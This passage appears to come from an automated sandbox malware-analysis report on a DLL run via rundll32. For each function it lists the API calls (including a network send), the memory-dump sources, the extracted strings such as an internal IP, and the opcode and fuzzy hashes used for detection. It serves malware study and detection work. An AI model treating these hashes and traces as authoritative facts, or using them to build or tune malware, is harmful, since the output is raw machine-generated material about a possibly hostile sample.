                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 696222070-0
                                                                                                                                                            • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                                            • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                                                            • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                                            • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                                              • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                                              • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                                            • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Mode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 696222070-0
                                                                                                                                                            • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                                            • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                                                            • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                                            • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                                            • _memset.LIBCMT ref: 10020424
                                                                                                                                                            • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 289641511-0
                                                                                                                                                            • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                                            • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                                                            • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                                            • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                                              • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                                              • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                                              • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                                              • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                                            • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                                              • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                                            • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2731880238-0
                                                                                                                                                            • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                                            • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                                                            • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                                            • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                                            • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                                              • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LongMenuWindow$AppendSystem
                                                                                                                                                            • String ID: 192.168.3.85$Message
                                                                                                                                                            • API String ID: 4121476972-856608562
                                                                                                                                                            • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                                            • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                                                            • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                                            • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                                              • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                                              • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                            • _strcat.LIBCMT ref: 1001310A
                                                                                                                                                              • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                                            • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 16450322-3653984579
                                                                                                                                                            • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                                            • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                                                            • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                                            • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                                              • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                                              • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                                              • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                                              • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                            • API String ID: 3274081130-63838506
                                                                                                                                                            • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                                            • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                                            • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                                            • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                                            • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                                            • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                                            • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                                            • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                                            • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                                            • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                                            • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2459298410-0
                                                                                                                                                            • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                                            • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                                                            • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                                            • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 365290523-0
                                                                                                                                                            • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                                            • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                                                            • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                                            • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$DesktopVisible
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1055025324-0
                                                                                                                                                            • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                                            • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                                                            • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                                            • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                                              • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 26245289-0
